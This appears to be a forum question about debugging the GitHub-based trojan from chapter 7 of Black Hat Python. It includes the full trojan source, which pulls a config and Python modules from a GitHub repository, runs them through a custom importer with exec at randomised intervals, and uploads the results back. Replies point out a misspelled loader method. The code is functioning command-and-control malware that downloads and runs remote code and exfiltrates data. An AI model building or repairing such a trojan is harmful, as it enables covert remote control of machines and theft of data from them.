# Black Hat Python Chapter 7, " AttributeError: 'GitImporter' object has no attribute 'load_module' " I dont understand how to fix this issue

Tags: python, github, python-importlib

I have already asked a question regarding the code showcased in chapter 7 of the second edition of the book Black Hat Python. While my previous problem was fixed, I am now getting a new problem, and i dont know how to fix it.
I'll put the error messages and the full code in hopes that someone on here can help me with my problem.

error messages:

```
[||] Retrieving dirlist
Traceback (most recent call last):
  File "git_trojan.py", line 82, in <module>
    trojan.run()
  File "git_trojan.py", line 48, in run
    config = self.get_config()
  File "git_trojan.py", line 33, in get_config
    exec("import %s" % task['module'])
  File "<string>", line 1, in <module>
  File "<frozen importlib._bootstrap>", line 991, in _find_and_load
  File "<frozen importlib._bootstrap>", line 975, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 655, in _load_unlocked
  File "<frozen importlib._bootstrap>", line 618, in _load_backward_compatible
AttributeError: 'GitImporter' object has no attribute 'load_module'
```

Note that the very first line is output from the program that is supposed to be there

full program:

```
import base64
import github3
import importlib
import json
import sys
import random
import threading
import time
from datetime import datetime

def connect_to_github():
    with open("mytoken.txt") as f:
        token = f.read()
    sess = github3.login(token=token)
    return sess.repository("Anderaxarex", "bhp_trojan")

def get_content(dirname, module_name, repo):
    return repo.file_contents(f'{dirname}/{module_name}').content

class Trojan:
    def __init__(self, id):
        self.id = id
        self.config_file = f'{id}.json'
        self.repo = connect_to_github()
        self.data_path = f'data/{id}'

    def get_config(self):
        config_file = get_content('config', f'{self.id}.json', self.repo)
        config = json.loads(base64.b64decode(config_file))

        for task in config:
            if task['module'] not in sys.modules:
                exec("import %s" % task['module'])
        return config

    def store_result(self, data):
        message = datetime.now().isoformat()
        remotepath = f'data/{self.id}/{message}.data'
        bindata = bytes('%r' % data, 'utf-8')
        self.repo.create_file(remotepath, message, base64.b64decode(bindata))

    def module_runner(self, module):
        result = sys.modules[module].run()
        self.store_result(result)

    def run(self):
        while True:
            config = self.get_config()
            for task in config:
                thread = threading.Thread(
                    target=self.module_runner, 
                    args=(task['module'],)
                )
                thread.start()
                time.sleep(random.randint(1, 10))

            time.sleep(random.randint(3*60, 3*60*60))

class GitImporter:
    def __init__(self):
        self.current_module_code=""
        
    
    def find_module(self, name, path=None):
        print("[||] Retrieving %s" % name)
        self.repo = connect_to_github()
        new_library = get_content('modules', f'{name}.py', self.repo)
        if new_library is not None:
            self.current_module_code = base64.b64decode(new_library)
            return self
    
    def load_modules(self, name):
        spec = importlib.util.spec_from_loader(name, loader=None, origin=self.repo.git_url)
        new_module = importlib.util.module_from_spec(spec)
        exec(self.current_module_code, new_module.__dict__)
        sys.modules[spec.name] = new_module
        return new_module

if __name__ == '__main__':
    sys.meta_path.append(GitImporter())
    trojan = Trojan('conf')
    trojan.run()
```

p.s. if u notice any other issues with my code feel free to point them out

Comment: In the code of `class GitImporter` you define a method named `load_modules`, not `load_module`, so `GitImporter` object indeed has no attribute `'load_module'`.

Comment: well so now it works better but its still giving me errors and the output logs are in chinese and korean and all sorts of other languages so im gonna make another question

Comment: Why not update this question directly